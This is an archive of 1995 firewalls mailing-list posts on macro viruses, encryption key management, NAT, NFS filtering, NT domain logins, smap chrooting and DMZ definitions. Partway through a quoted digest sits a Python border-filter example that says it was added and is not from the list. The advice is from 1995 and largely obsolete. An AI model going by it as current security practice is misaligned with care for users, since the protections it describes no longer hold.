>1) it is *impossible* to prevent a determined individual from
>transferring executables via email. (But you can slow them down)

Quibble: if you block the common mechanisms, then it will take ->two<-
individuals, one - perhaps unwitting - to install the decode/execute
mechanism on the inside.

>However, I must admit that I'd be interested in a Word document macro
>virus scanner :) These "executable content" vira are an interesting
>breed.

Still think "scanners" are not a global solution. Am not particularly
interested in providing a steady income to some for "updates", just want to
block the spread. Now all you need for that is to disallow execution of
macros from documents (with notice that the document contains one).
*Documents are not supposed to contain macros*. The fact that they CAN and
that the default installation of WORD will execute them are some of the
causes of the current problem. Of course if we demonstrate how easy it is to
block them (either with DisableAutoMacros or by using a viewer like the free
one that comes from Microsloth), maybe they will go the way of ANSI bombs and
writing to CLK$.
Warmly,
Padgett

From firewalls-owner Wed Oct 4 07:00:38 1995
From: "A. Padgett Peterson, P.E. Information Security"
To: firewalls@greatcircle.com
Date: Wed, 4 Oct 1995 9:45:44 -0400 (EDT)
Subject: re: Encryption Strength
Message-Id: <951004094544.2105ed38@hobbes.orl.mmc.com>

>Would it suffice to say that it was good enough for NSA - and that it is the
>*only* Internet firewall used in a NSA-approved configuration? In a public
>forum, this is probably all I can say.

No,

a) Cryptic remarks like that have no place on a public forum IMNSHO and are
   considered free of content. Better not to be said at all.

b) Was talking to X-3 (dept id, not a code name 8*) yesterday and it was not
   mentioned. Asked specifically about firewalls (true those folks do not
   volunteer and I was asking about another subject but did ask specifically
   which firewalls had been "examined").

c) "Security by obscurity" rates a "Run, do not Walk".

d) "Assume" you refer to the MISSI stuff approved for connection of
   up-to-Secret LANs to unclassified. Those I know of still require an
   out-of-channel exchange to take place to define "trust".

e) The NSA/NIST/NCSA conference in Baltimore next week will be a good place
   to discuss such things (plug). Vendor suites with open bars particularly
   appreciated 8*). Is Tuesday 10th - Friday 13th at the convention center at
   the Inner Harbour. Don't miss Phillips.
Warmly,
Padgett

From firewalls-owner Wed Oct 4 07:54:55 1995
From: Rick Smith
To: firewalls@greatcircle.com
Cc: smith@sctc.com
Date: Wed, 4 Oct 1995 09:42:35 -0500
Subject: Re: Encryption strength
Message-Id: <199510041442.JAA02645@shade.sctc.com>
References: <9510040306.AA12903@su1.in.net>

frankw@in.net (Frank Willoughby) says:

>>>Actually, the key management problem was solved by V-ONE a couple of years
>>>ago. (V-ONE is a firewall vendor).

>Padgett asks the obvious:

>>Sounds wonderful but pray tell *how* do they authenticate each other ?

>So Frank rites:

>Would it suffice to say that it was good enough for NSA - and that it is the
>*only* Internet firewall used in a NSA-approved configuration? In a public
>forum, this is probably all I can say.

Interesting. The only "approved configuration" I know of wasn't so much NSA
as DISA, and the cryptographic services were irrelevant to its application.
If you really do know of an "approved configuration" involving crypto on a
commercial firewall, then there are at least *two* different "approved
configurations" out there.

There have been several "solutions" to the "key management problem," and so
far nobody, not even NSA, has come up with one that solves everything.
Choosing a key management scheme is just like any other big mechanism
decision: it depends on what your threats and operational objectives are. PGP
takes one approach yielding one set of results, FORTEZZA takes another.

It is true that we can't pick apart the details of whatever these government
configurations *are* in a public forum. However, I suspect that any 2 year
old commercial implementation is probably at most proprietary information.
Most likely there's a public whitepaper describing what V-One does, and how.
If V-One (or its crypto implementer) is represented on this list, it might be
interesting to hear a first hand report of what they really achieve.

Rick.
smith@sctc.com
secure computing corporation

From firewalls-owner Wed Oct 4 08:33:32 1995
From: Mike Shaver
To: firewalls@greatcircle.com, paul@vix.com
Date: Wed, 4 Oct 1995 11:24:12 -0400 (EDT)
Subject: Network Address Translation stuff
Message-Id: <199510041524.LAA11947@neon.ingenia.com>

Paul Vixie mumbled something vague about:
> >I've heard there are a couple
> >of commercial network address translators
> >available for those of us who were foolish enough to build extensive
> >enterprise networks on non-NIC assigned addresses. Does anyone have any
> >real-world experience with such a product?
>
> At Usenix LISA a few weeks ago in Monterey, CA, the first booth inside the
> front door belonged to a company that sold NAT boxes. They appeared to be
> based on some BSD flavour, and they wanted to sell hardware rather than just
> a software solution. Now if I could only remember their company name. Ah,
> here it is in the vendor directory included with my conference materials:
> Border Network Technologies; Borderware Firewall Server; .

Newer Linux kernels include IP masquerading functionality, which does this
sort of thing, in software. (For free, too, which is a nice touch.) The
state-of-the-art (which may not be suitable for a production environment;
YMMV) includes code to parse FTP packets and alter the PORT lines, and
similar support for talk is pending.

More information is available at ftp://ftp.eves.com/pub/linux/masq (I think).

Mike (who also doesn't follow firewalls as closely as he should... please cc:
on response)

--
#> Mike Shaver (shaver@ingenia.com) Ingenia Communications Corporation <#
#> UNIX medicine man -- dark magick, cheap! <#
#> <#
#> When the going gets tough, the tough give cryptic error messages. <#
#> "We believe in rough consensus and running code." <#
From firewalls-owner Wed Oct 4 09:53:14 1995
From: "Pat Heinle"
To: Firewalls@GreatCircle.COM
Date: 4 Oct 1995 12:46:35 -0500
Subject: Re: Firewalls-Digest V4 #573

Reply to: RE>Firewalls-Digest V4 #573

From: pheinle@mitre.org
Subject: RE> Borderware vs. Firewall-1

Mr. Tate asks:

I am in the process of purchasing a firewall package for the company I work
for. I have narrowed my choices down to Borderware and Firewall-1. Which is a
better choice, and why? Is there another package out there that is better I
may not have seen?

rtate@folio.com
--

Robert,

"Info Security News" just had a supplement to their magazine for Sept/Oct. 95
entitled "Internet Security." Within the "Internet Security" supplement was
a section -Shopping for Firewalls which contained a matrix of a majority of
the current firewall products and their attributes. It might provide some
additional insight.

In addition to your Security Policy, which Luc noted in his response, another
issue to consider is how well the Firewall product adjusts as your enterprise
expands.

Good luck.

Patty

--------------------------------------
Date: 10/4/95 11:34 AM
To: Pat Heinle
From: Firewalls@GreatCircle.COM

!!! Original message was too large.                !!!
!!! It is contained in the enclosure whose name    !!!
!!! is the same as the subject of this message.    !!!
A preview of the message follows:

Firewalls-Digest        Wednesday, 4 October 1995        Volume 04 : Number 573

In this issue:

  -No Subject-
  IRC
  FLEXlm with proxy ...?
  Re: NFS
  Need Windows FTP client source
  Borderware (was: Information, We want information)
  Re: Encryption strength
  Borderware vs. Firewall-1
  Exact format for subscribing the info security list.
  re: Encryption strength
  re re nfs
  Re: Mail Proxy
  Re: FW to FW FTP w/ no port > 1023
  re: Encryption strength
  re: network address translation
  RE: Borderware vs. Firewall-1
  [none]
  Re: Encryption strength
  Re: Mail proxy

See the end of the digest for information on subscribing to the Firewalls or
Firewalls-Digest mailing lists and on how to retrieve back issues.

----------------------------------------------------------------------

From: Joseph Urban
Date: 3 Oct 95 14:12:00
Subject: -No Subject-

sunscribe firewalls-digest

------------------------------

From: oddboy@vegas.com
Date: Tue, 3 Oct 1995 11:42:44 -0700
Subject: IRC

I find myself in the position of having to put up a private IRC server
(private being not connected to either Undernet or Efnet). Basically this is
to allow "chat" forums for a few of my clients. I would like to make these
chat lines live outside of my firewall (and plan on it) but am curious what I
should watch out for in terms of folks being able to hack through and into an
OS. (I run Solaris 2.4 but I think the IRC server will run on a DEC box
running OSF/DecUnix.) Any and all info will be greatly appreciated.

Gideon Wober
Systems Administrator
Digitainment Corporation

------------------------------

From: jordan@Heuristicrat.COM (Jordan M. Hayes)
Date: Tue, 3 Oct 95 12:09:16 PDT
Subject: FLEXlm with proxy ...?

Anyone built a FLEXlm proxy for FWTK?
/jordan

------------------------------

From: Doug Hughes
Date: Tue, 3 Oct 1995 13:42:56 -0500
Subject: Re: NFS

>
>I am sure that this topic has been beaten to death, so if someone would
>just point me at the discussion (or tell me that there is no solution)
>I would be happy to take it from there. I remember reading a paper a
>couple years ago describing why NFS could never be made secure, but for
>the life of me I can't seem to find it now.
>
>The problem is SUN's NFS under SUNOS 4.1.3/4. I have a server with a half
>dozen file systems that are exported read-only to all the other machines
>in the domain. I would like to restrict their mounting to machines within
>the domain while maintaining connectivity to the outside world.
>SUN's software does not support this option, it only allows specifying
>specific machine names, and the list of *all* machine names overflows
>some internal limit in SUN's software.
>
>[ The machine uses DNS and not YP, it is rumored that possibly with YP one
>can get by this limit, but I have no interest in adding YP to my list of
>problems. ]
>
>So, the Questions
>
> (1) WITHOUT resorting to a firewall, is there any way to accomplish
>what I want to do?
>
> (2) If not, can it be done with a `simple' packet filter, or does it
>require a full blown firewall?
>
>
> Reg.Clemens
> clemens@dwf.com
>

Without necessarily resorting to a firewall, you can have your router to the
outside world block:

  port 2049/udp - NFS
  port 111 udp/tcp - Sun RPC
  source routed packets
  outside packets with internal IP source addresses (IP spoofing)

This helps prevent a great deal of the most common attacks on NFS by
preventing it getting outside your domain at the interface to the Internet.

Also, installing the replacement tcp_wrappered version of portmap on your NFS
servers from ftp.win.tue.nl is a good thing to do. This way you can limit
what networks are able to send RPC requests to your server.
--
____________________________________________________________________________
Doug Hughes                                   Engineering Network Services
System/Net Admin                              Auburn University
doug@eng.auburn.edu
Apple T-shirt on Win95 - "Been there, done that"

------------------------------

From: Joe McGuckin
Date: Tue
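The four border-router rules in Doug Hughes' NFS reply above, plus the host-side portmap restriction he mentions, carried out as a small rule evaluator. This is an added example, not code from the list or from any router or portmap implementation; the internal prefix 192.0.2.0/24 and every packet below are constructed, and the port block is applied in both directions, which is an assumption the reply does not spell out.

```python
"""Border filter for NFS exposure (constructed example of the rules in the reply)."""
from ipaddress import ip_address, ip_network

# assumed internal address space (documentation range, constructed)
INTERNAL_NETS = [ip_network("192.0.2.0/24")]

# services the reply says to block at the router to the outside world
BLOCKED_SERVICES = {
    ("udp", 2049): "nfs",
    ("udp", 111): "sunrpc-portmap",
    ("tcp", 111): "sunrpc-portmap",
}


def is_internal(addr):
    """True if addr lies in one of our internal prefixes."""
    a = ip_address(addr)
    return any(a in net for net in INTERNAL_NETS)


def verdict(pkt):
    """Evaluate one packet at the border router.

    pkt: dict with src, dst, proto ('udp'/'tcp'), dport, direction ('in'/'out')
         and an optional source_routed flag.
    Returns 'accept' or 'drop:<reason>'; the first matching rule wins.
    """
    # rule: source routed packets
    if pkt.get("source_routed", False):
        return "drop:source-routed"
    # rule: outside packets carrying an internal source address (IP spoofing)
    if pkt["direction"] == "in" and is_internal(pkt["src"]):
        return "drop:spoofed-internal-source"
    # rule: 2049/udp and 111/udp+tcp, blocked in either direction (assumption)
    svc = BLOCKED_SERVICES.get((pkt["proto"], pkt.get("dport")))
    if svc is not None:
        return "drop:" + svc
    return "accept"


def portmap_allowed(src):
    """Host-side check in the spirit of the tcp_wrappered portmap: only the
    internal networks may issue RPC requests to the NFS server."""
    return is_internal(src)


def summarize(packets):
    """Count verdicts over a packet list, the way a filter log would be tallied."""
    counts = {}
    for p in packets:
        v = verdict(p)
        counts[v] = counts.get(v, 0) + 1
    return counts


# constructed sample traffic as seen at the border
SAMPLE_PACKETS = [
    {"src": "198.51.100.7", "dst": "192.0.2.10", "proto": "udp", "dport": 2049, "direction": "in"},
    {"src": "203.0.113.9", "dst": "192.0.2.10", "proto": "tcp", "dport": 111, "direction": "in"},
    # claims an internal source but arrives on the outside interface
    {"src": "192.0.2.5", "dst": "192.0.2.10", "proto": "tcp", "dport": 2049, "direction": "in"},
    {"src": "198.51.100.7", "dst": "192.0.2.25", "proto": "tcp", "dport": 25,
     "direction": "in", "source_routed": True},
    {"src": "198.51.100.7", "dst": "192.0.2.25", "proto": "tcp", "dport": 25, "direction": "in"},
    {"src": "192.0.2.5", "dst": "198.51.100.53", "proto": "udp", "dport": 53, "direction": "out"},
]

if __name__ == "__main__":
    for p in SAMPLE_PACKETS:
        print(p["direction"], p["src"], p["proto"], p["dport"], "->", verdict(p))
    print(summarize(SAMPLE_PACKETS))
```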
From firewalls-owner Wed Oct 4 12:22:53 1995
From: mark.horn1@jsc.nasa.gov
To: firewalls@greatcircle.com
Date: Wed, 4 Oct 1995 14:00:11 -0500 (CDT)
Subject: Technical details of NT Domains..
Message-Id: <199510041900.OAA00439@freefall.jsc.nasa.gov>

Hello,

We have some users who need to login to a windows NT domain that has been
set up here. We currently have an IP firewall installed. This firewall is
installed on our LAN and protects us from the Internet. Since there isn't a
site wide firewall, it also protects us from the rest of JSC. It's a screened
host gateway (Nomenclature taken from Marcus J. Ranum's "Thinking About
Firewalls"). Currently, only IP is filtered at our firewall. All non-IP
protocols are passed through. All non-IP protocols are filtered at the site's
connection to the Internet.

Now, it turns out that my users can't login to an NT domain.
I wouldn't have expected this because I assumed that NT would have used NetBEUI or some such other non-IP protocol to communicate. After some experimentation, I've discovered that I need to set up the following for this to work:

a) Each Win95 machine needs to have a WINS server configured
b) UDP needs to be wide open to that Win95 machine.

It looks like WINS is a UDP based protocol, and it manages the name resolution for the NT domain. Then, using some unknown protocol, our machines talk to the NT domain server for authentication. From there, they talk to the individual disk servers in the NT domain over NetBEUI. (All of this is not much more than a Wild Ass Guess (tm))

So, the question is can anyone tell me the specifics of how one logs into an NT domain? In particular, what are the details of the data exchange? What I'm looking for is something along the lines of how Brent Chapman describes protocols in his tutorials (e.g. NTP servers send to & from UDP port 123, NTP clients send to UDP 123, and from random UDP port >1023). Does anyone know how logging into an NT domain utilizes UDP? If WINS is the only thing using UDP, has anyone set up udprelay to act as a proxy for it?

Thanks in advance.

--
Mark Horn (sparkie)   horn@mickey.jsc.nasa.gov   http://tommy.jsc.nasa.gov/~horn   mark.horn1@jsc.nasa.gov
Free Advice and Opinions -- Refunds Available

From firewalls-owner Wed Oct 4 12:53:18 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA21663 for firewalls-outgoing; Wed, 4 Oct 1995 12:30:04 -0700 Received: from netcom11.netcom.com (netcom11.netcom.com [192.100.81.121]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id MAA21656 for ; Wed, 4 Oct 1995 12:30:01 -0700 Received: by netcom11.netcom.com (8.6.12/Netcom) id MAA22431; Wed, 4 Oct 1995 12:28:23 -0700 From: okuyama@netcom.com (Darin Okuyama) Message-Id: <199510041928.MAA22431@netcom11.netcom.com> Subject: running "smapd" chrooted ..
To: firewalls@greatcircle.com (Firewall Mailing List) Date: Wed, 4 Oct 1995 12:28:23 -0700 (PDT) X-Mailer: ELM [version 2.4 PL24] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 485 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

My firewall has the following configuration for "smap" and "smapd":

    smap, smapd: directory /var/mail

According to the documentation, "smap" does a chroot to the specified directory, but it seems "smapd" doesn't. Questions:

    1. Is running "smapd" chrooted a lot safer than not?

    2. What exactly would it take to run "smapd" chrooted?

    3. If one is running "smapd" chrooted, I suppose one should run the periodic check of the "mqueue" chrooted too?

---Darin Okuyama

From firewalls-owner Wed Oct 4 13:54:02 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA24485 for firewalls-outgoing; Wed, 4 Oct 1995 13:49:23 -0700 Received: from gw.home.vix.com (gw.home.vix.com [192.5.5.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id NAA24477 for ; Wed, 4 Oct 1995 13:49:18 -0700 Received: by gw.home.vix.com id AA27100; Wed, 4 Oct 95 13:47:47 -0700 X-Btw: vix.com is also gw.home.vix.com and vixie.sf.ca.us Received: by wisdom.home.vix.com id AA27158; Wed, 4 Oct 1995 13:47:46 -0700 Message-Id: <9510042047.AA27158@wisdom.home.vix.com> To: firewalls@greatcircle.com Cc: Mike Shaver Subject: Re: Network Address Translation stuff In-Reply-To: Your message of "Wed, 04 Oct 1995 11:24:12 EDT." <199510041524.LAA11947@neon.ingenia.com> Date: Wed, 04 Oct 1995 13:47:46 -0700 From: Paul A Vixie Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

> Newer Linux kernels include IP masquerading functionality, which does
> this sort of thing, in software. (For free, too, which is a nice
> touch.)
>
> The state-of-the-art (which may not be suitable for a production
> environment; YMMV) includes code to parse FTP packets and alter the
> PORT lines, and similar support for talk is pending.

I guess I thought this would have gone without saying, but I don't agree with the idea of modifying PORT verbs in stream -- this is a very slippery slope indeed. IBM's NAT does FTP proxying via DNS tricks and temporary address assignments, and accomplishes its goals without any layering violations -- in particular the user data is never interpreted. This goes to show that it can be done without searching for PORT verbs in user data.

From firewalls-owner Wed Oct 4 15:54:00 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id PAA00836 for firewalls-outgoing; Wed, 4 Oct 1995 15:47:44 -0700 Received: from provider.ins.com (provider.ins.com [199.0.194.125]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id PAA00829 for ; Wed, 4 Oct 1995 15:47:34 -0700 Received: from mattpc.ins.com (lab_pc.ins.com [199.0.193.229]) by provider.ins.com (8.6.12/8.6.12) with SMTP id SAA08983 for ; Wed, 4 Oct 1995 18:45:57 -0400 Date: Wed, 4 Oct 1995 18:45:57 -0400 Message-Id: <199510042245.SAA08983@provider.ins.com> X-Sender: waugh@provider.ins.com X-Mailer: Windows Eudora Version 2.1.1 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: firewalls@greatcircle.com From: Matthew Waugh Subject: Re: running "smapd" chrooted .. Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

That's a strange configuration - you send smap to some separate area so that if it is broken into there is nothing it can access; it appears your setup is giving away access to the mailboxes.

Anyway - the reason smap runs chroot is because it's the process listening on port 25. It's supposed to be a simple, clearly understood program that is not susceptible to attack - and even if attacked all it allows is access to some restricted chroot area.
On the other hand smapd takes the output of smap, is not running with privilege, and so it can hand the message off to sendmail with less risk of a mail message giving access to the system.

Off-hand, running smapd chroot would be possible, but awfully difficult, because what you actually end up doing is running sendmail chrooted (all smapd does is format traffic and give it to sendmail). If running sendmail chroot was easy we'd probably be doing that and not running smap/smapd. You'd probably have to include so much of the system in your chroot area for smapd that the actual security obtained would be minimal.

Mat

At 12:28 PM 10/4/95 -0700, you wrote:
>
>My firewall has the following configuration for "smap" and "smapd":
>
>    smap, smapd: directory /var/mail
>
>According to the documentation, "smap" does a chroot to the specified
>directory, but it seems "smapd" doesn't. Questions:
>
>    1. Is running "smapd" chrooted a lot safer than not?
>
>    2. What exactly would it take to run "smapd" chrooted?
>
>    3. If one is running "smapd" chrooted, I suppose one should run
>       the periodic check of the "mqueue" chrooted too?
>
>---Darin Okuyama
>
>

--
Matthew Waugh   Matthew_Waugh@ins.com   INS - Raleigh, NC

From firewalls-owner Wed Oct 4 16:22:55 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id QAA01758 for firewalls-outgoing; Wed, 4 Oct 1995 16:18:21 -0700 Received: from inet-smtp-gw-1.us.oracle.com (inet-smtp-gw-1.us.oracle.com [192.86.155.81]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id QAA01751 for ; Wed, 4 Oct 1995 16:18:03 -0700 Received: from mailsun2.us.oracle.com by inet-smtp-gw-1.us.oracle.com with SMTP (8.6.12/37.7) id QAA25555; Wed, 4 Oct 1995 16:16:31 -0700 Received: by mailsun2.us.oracle.com (4.1/37.8) id AA28157; Wed, 4 Oct 95 16:17:21 PDT Message-Id: <9510042317.AA28157@mailsun2.us.oracle.com> Date: 04 Oct 95 16:09:49 -0700 From: "David Sidwell" To: firewalls@greatcircle.com Subject: DMZ definition ?
Reply-To: dasidwel@us.oracle.com Mime-Version: 1.0 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

Can anyone give me a concise definition of the term Demilitarized Zone, or DMZ for short, in connection with firewall terminology? I am under the belief, perhaps incorrectly, that it is used to refer to any kind of screened subnet placed between the internal networks and the Internet (or other external networks). A colleague of mine is convinced that it is a separate subnet hung off a single firewall machine.

So would the following be correctly termed DMZ's or not?

1.
              [ packet  ]                  [ packet  ]
   Internet---[filtering]----DMZ subnet----[filtering]---internal
              [ router  ]    (containing   [ router  ]   networks
                             publically
                             accessible
                             machines)

2. As above but protected by firewalls instead of packet filtering routers.

3.
   Internet----firewall----internal networks...
                  |
                  |
                 DMZ
                subnet

Finally, does a DMZ implementation always prevent direct IP forwarding from Internet to internal nets?

TIA,
David Sidwell

From firewalls-owner Wed Oct 4 16:30:10 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id PAA01038 for firewalls-outgoing; Wed, 4 Oct 1995 15:59:24 -0700 Received: from mycroft.GreatCircle.COM (mycroft.greatcircle.com [198.102.244.35]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id PAA01031 for ; Wed, 4 Oct 1995 15:59:21 -0700 Received: from ford.gbnet.org by mycroft.GreatCircle.COM (8.6.10/SMI-4.1/Brent-950602) id PAA02823; Wed, 4 Oct 1995 15:50:50 -0700 Received: (from steve@localhost) by ford.gbnet.org (8.7.Beta.10/8.6.12) id XAA15887; Wed, 4 Oct 1995 23:53:43 +0100 (BST) From: Steve Kennedy Message-Id: <199510042253.XAA15887@ford.gbnet.org> Subject: Re: Technical details of NT Domains..
To: mark.horn1@jsc.nasa.gov Date: Wed, 4 Oct 1995 23:53:43 +0100 (BST) Cc: firewalls@GreatCircle.COM In-Reply-To: <199510041900.OAA00439@freefall.jsc.nasa.gov> from "mark.horn1@jsc.nasa.gov" at Oct 4, 95 02:00:11 pm X-Mailer: ELM [version 2.4 PL24alpha3] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

According to mark.horn1@jsc.nasa.gov

> So, the question is can anyone tell me the specifics of how one logs into an
> NT domain? In particular, what are the details of the data exchange? What
> I'm looking for is something along the lines of how Brent Chapman describes
> protocols in his tutorials (e.g. NTP servers send to & from UDP port 123, NTP
> clients send to UDP 123, and from random UDP port >1023). Does anyone know
> how logging into an NT domain utilizes UDP?

Check out Samba (SMB server for UNIX). This will shortly support master browsing and domain controller functionality. The master site is ftp://nimbus.anu.edu.au/pub/tridge/samba (or very similar - it's late here) - though mirrored in lots of places. It has pretty good docs with it and explains how logging in etc. work.
Regards

Steve

--
home  steve@gbnet.org  * Flat 2, 43 Howitt Road, Belsize Pk, London NW3 4LU
work  steve@demon.net  * tel +44-(0)171 483 1169  FAX +44-(0)181 444 6103
www   http://www.gbnet.net/  * GSM mobile +44-(0)802 444 500
bits  steve@gbnet.net  * GSM data @2400 0802-449500 @9600 449501 fax 449502
Euro firewall info - send mail to majordomo@gbnet.net (subscribe firewalls-uk)

From firewalls-owner Wed Oct 4 16:52:40 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id QAA01823 for firewalls-outgoing; Wed, 4 Oct 1995 16:23:40 -0700 Received: from prometheus.microchip.com (PROMETHEUS.MICROCHIP.COM [198.175.253.66]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id QAA01816 for ; Wed, 4 Oct 1995 16:23:36 -0700 Received: (from daemon@localhost) by prometheus.microchip.com (8.6.12/8.6.9) id QAA02185 for ; Wed, 4 Oct 1995 16:27:38 -0700 Received: from pegasus.microchip.com(199.170.150.38) by prometheus.microchip.com via smap (V1.3) id sma002183; Wed Oct 4 16:27:25 1995 Received: from localhost (localhost.Microchip.COM [127.0.0.1]) by pegasus.Microchip.COM (8.7/8.7) with ESMTP id QAA08533; Wed, 4 Oct 1995 16:11:07 -0700 (MST) Message-Id: <199510042311.QAA08533@pegasus.Microchip.COM> To: Snow-Flower cc: Firewalls@greatcircle.com Subject: Re: Exact format for subscribing the info security list. In-reply-to: Your message of "Wed, 04 Oct 1995 10:01:03 +0900."
<199510040101.KAA17605@vision.postech.ac.kr> Date: Wed, 04 Oct 1995 16:11:05 -0700 From: Gustavo Vegas Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

Hello,

I do not know if anyone has answered this posting, and I think this info may be of general interest to the list, so, here it goes:

[extracted from the response to the command "lists detail" to their listserver]

* -------------------------------------------
* INFSEC-L Information Systems Security Forum
* -------------------------------------------
* INFSEC-L is for discussions of information systems security and
* related issues. Discussions are not moderated. Thus, all messages
* sent to the list are immediately distributed to members of the
* list. The discussion list is an outgrowth of the "Technology
* for the Information Security '94: Managing Risk" at Galveston, TX
* (December 5-8, 1994). The main objective of the list is to foster
* open and constructive communication among information systems security
* and auditing professionals in government, industry, and academic
* institutions. Initial subscriptions are screened by listowner to
* ensure that only appropriate professionals are subscribed.
*
* To subscribe to INFSEC-L, send:
*
*     SUBSCRIBE INFSEC-L yourname
*
* in the body of email message to LISTSERV@ETSUADMN.ETSU.EDU (leave
* the subject line blank).
*
* Participation in this list is not limited to and does not imply
* affiliation with East Texas State University (ETSU). Views expressed
* in no way reflect the opinions of ETSU administration, its students,
* its faculty/staff, and its Board of Regents.
*
* PLEASE NOTE: Replies are set up to go to the LIST as an aid to
* facilitate discussion. You can OVERRIDE the REPLY option by
* including a Reply-To: option in the header of mail you send to
* INFSEC-L@ETSUADMN.BITNET.
*
* Monthly notebooks will be maintained. For a list, send LISTSERV at
* ETSUADMN the command: INDEX INFSEC-L .
* For example:
*     TELL LISTSERV AT ETSUADMN INDEX INFSEC-L   or
*     SEND LISTSERV@ETSUADMN INDEX INFSEC-L   etc.
*
* To UNSUBSCRIBE, send the command: SIGNOFF INFSEC-L to
* LISTSERV@ETSUADMN.ETSU.EDU. Please bear in mind that LISTSERV
* commands go to the LISTSERV ID, *NOT* to the list! For more
* information on LISTSERV, send the command: INFO to
* LISTSERV@ETSUADMN.ETSU.EDU. This may be sent TEXT LINE of MAIL,
* or in a file.
* (BITNET: TELL LISTSERV AT ETSUADMN HELP on CMS, or
* SEND LISTSERV@ETSUADMN HELP using JNET, etc.).

===========================================+===========================
Gustavo Vegas                               Gustavo.Vegas@Microchip.COM
CAD Systems Administrator                   Microchip Technology Inc.
                                            Chandler, Arizona
===========================================+===========================

From firewalls-owner Wed Oct 4 17:22:42 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id RAA02669 for firewalls-outgoing; Wed, 4 Oct 1995 17:10:17 -0700 Received: from scifi.maid.com (scifi.emi.net [204.181.45.10]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id RAA02662 for ; Wed, 4 Oct 1995 17:10:12 -0700 Received: (from njs@localhost) by scifi.maid.com (8.6.11/8.6.9) id UAA06615; Wed, 4 Oct 1995 20:08:33 -0400 Date: Wed, 4 Oct 1995 20:08:33 -29900 From: Nick Simicich Subject: Re: Encryption strength cc: firewalls@GreatCircle.COM In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

On Wed, 4 Oct 1995, David Miller wrote:

> On Tue, 3 Oct 1995, Frank Willoughby wrote:
> >
> > >From padgett's excellent mail:
>
> But this is the crux of the chicken-and-egg problem. How do they
> mutually authenticate each other? If they do it with a shared secret or
> through prior arrangement a secure channel had to previously exist.
> If there is no third party/shared secret then it's subject to a
> man-in-the-middle attack.

The new version of IBM's firewall provides this function. To set up a secure channel, you describe the channel, and it cuts a diskette, which you fedex to the other party.

> Now if *that's* been solved, I'd be *delighted* to hear about it!

I thought that was what the public key distribution stuff was all about.

Nick Simicich - njs@scifi.emi.net - (last choice) njs@bcrvm1.vnet.ibm.com
http://scifi.emi.net/njs.html -- Stop by and Light Up The World!

From firewalls-owner Wed Oct 4 17:52:33 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id RAA03776 for firewalls-outgoing; Wed, 4 Oct 1995 17:37:20 -0700 Received: from relay-1.mail.demon.net (relay-1.mail.demon.net [158.152.1.140]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id RAA03756 for ; Wed, 4 Oct 1995 17:37:14 -0700 Received: from post.demon.co.uk by relay-1.mail.demon.net id aa22534; 4 Oct 95 13:36 +0100 Date: Wed, 4 Oct 95 13:29:38 PDT From: stuart@loddon.demon.co.uk Subject: WWW & Proxy Servers To: firewalls-digest@greatcircle.com X-Mailer: Chameleon - TCP/IP for Windows by NetManage, Inc. Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

Apologies if the following questions have been asked before - if they have, I can't find them!

i) Is/Are there any proxy servers for WWW to restrict access to the WWW on a username basis AND to further restrict use of 'sub-protocols' supported by WWW such as ftp, gopher ... again on a username basis?

ii) If yes to i), can you provide pointers please?

iii) If no to i), is the requirement technically feasible - if so, any clues?

iv) If the above has been done, has it been integrated with strong authentication tokens e.g. SecureID, Digital Pathways or even S/Key?
TIA

-------------------------------------
Name: Stuart Broderick
E-mail: stuart@loddon.demon.co.uk
Date: 10/04/95:13:29:38
This site is not affiliated with any other in demon.co.uk.
-------------------------------------

From firewalls-owner Wed Oct 4 19:22:45 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id TAA05661 for firewalls-outgoing; Wed, 4 Oct 1995 19:01:26 -0700 Received: from ingress.com (ingress.com [199.171.57.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id TAA05654 for ; Wed, 4 Oct 1995 19:01:22 -0700 Received: from starlight.ingress.com by ingress.com (4.1/SMI-4.1) id AA01523; Wed, 4 Oct 95 21:53:39 EDT Received: by starlight.ingress.com (4.1) id AA07907; Wed, 4 Oct 95 21:53:58 EDT Date: Wed, 4 Oct 1995 21:53:56 -0400 (EDT) From: Charles Kaplan To: firewalls@greatcircle.com Subject: RE: BorderWare vs. Firewall-1 Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

I have sat quietly on this list the past month or two (been reading and posting for almost 2 years) due to huge work loads, but the past few days have started to irk me. I will say that I resell BorderWare for a good part of my living. However, I sell security, and the customer's needs are first, not just me pushing my product. With that said, let me post up 3 or 4 messages in one clump.

------

>From: RTATE@folio.com
